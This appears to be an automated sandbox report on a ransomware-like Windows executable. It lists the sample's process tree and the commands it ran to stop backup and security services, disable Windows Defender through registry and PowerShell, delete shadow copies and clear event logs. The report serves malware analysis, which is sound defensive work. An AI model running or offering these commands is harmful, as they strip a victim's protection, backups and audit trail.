5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1620 wrote to memory of 656 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 656 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 656 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 656 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 656 wrote to memory of 704 656 net.exe net1.exe PID 656 wrote to memory of 704 656 net.exe net1.exe PID 656 wrote to memory of 704 656 net.exe net1.exe PID 656 wrote to memory of 704 656 net.exe net1.exe PID 1620 wrote to memory of 1640 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 1640 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 1640 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 1640 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1640 wrote to memory of 1020 1640 net.exe net1.exe PID 1640 wrote to memory of 1020 1640 net.exe net1.exe PID 1640 wrote to memory of 1020 1640 net.exe net1.exe PID 1640 wrote to memory of 1020 1640 net.exe net1.exe PID 1620 wrote to memory of 1148 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 1148 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 1148 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 1148 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1148 wrote to memory of 1804 1148 net.exe net1.exe PID 1148 wrote to memory of 1804 1148 net.exe net1.exe PID 1148 wrote to memory of 1804 1148 net.exe net1.exe PID 1148 wrote to memory of 1804 1148 net.exe net1.exe PID 1620 wrote to memory of 1952 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 1952 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 1952 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 1952 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1952 wrote to memory of 308 1952 net.exe net1.exe PID 1952 wrote to memory of 308 1952 net.exe net1.exe PID 1952 wrote to memory of 308 1952 net.exe net1.exe PID 1952 wrote to memory of 308 1952 net.exe net1.exe PID 1620 wrote to memory of 824 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 824 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 824 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 824 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 824 wrote to memory of 1056 824 net.exe net1.exe PID 824 wrote to memory of 1056 824 net.exe net1.exe PID 824 wrote to memory of 1056 824 net.exe net1.exe PID 824 wrote to memory of 1056 824 net.exe net1.exe PID 1620 wrote to memory of 660 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 660 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 660 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 660 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 660 wrote to memory of 1172 660 net.exe net1.exe PID 660 wrote to memory of 1172 660 net.exe net1.exe PID 660 wrote to memory of 1172 660 net.exe net1.exe PID 660 wrote to memory of 1172 660 net.exe net1.exe PID 1620 wrote to memory of 1112 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 1112 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 1112 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 1112 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1112 wrote to memory of 1664 1112 net.exe net1.exe PID 1112 wrote to memory of 1664 1112 net.exe net1.exe PID 1112 wrote to memory of 1664 1112 net.exe net1.exe PID 1112 wrote to memory of 1664 1112 net.exe net1.exe PID 1620 wrote to memory of 992 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 992 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 992 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1620 wrote to memory of 992 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 992 wrote to memory of 988 992 net.exe net1.exe PID 992 wrote to memory of 988 992 net.exe net1.exe PID 992 wrote to memory of 988 992 net.exe net1.exe PID 992 wrote to memory of 988 992 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe"C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\SysWOW64\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:704
-
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1020
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1804
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:308
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1056
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:660 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1172
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1664
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:988
-
C:\Windows\SysWOW64\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1812
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1712
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1656
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1624
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1896
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵PID:780
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1632
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2000
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1604
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:328
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:704
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1984
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1064
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:972
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1440
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1100
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1192
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1664
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1028
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1704
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1736
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1748
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1908
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:896
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1864
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1868
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1212
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1216
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1180
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1272
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1520
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1208
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:280
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:460
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1964
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:900
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2028
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1988
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:912
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1056 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1108
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1892 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1904 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:756 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1940 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:600 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1168
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1304 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:776
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1340 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1732
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1352
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5136df8aa392c6a628beedcf3fa5b77ef
SHA1b1358967b392b0066c22811f77833433e71da1ac
SHA2562704d62928993cbc601f280dd74c224b8f89b96e52b5e6f57d97eaa642c3a16f
SHA51244d017d9f003032f1f860fe055e628601a3e788ca8cfbf5b4176af5fe1f03387062f07c32d4cf5c935451f41ebb8c40fb21c0ea5f0aa3a0230db624d026ed8b9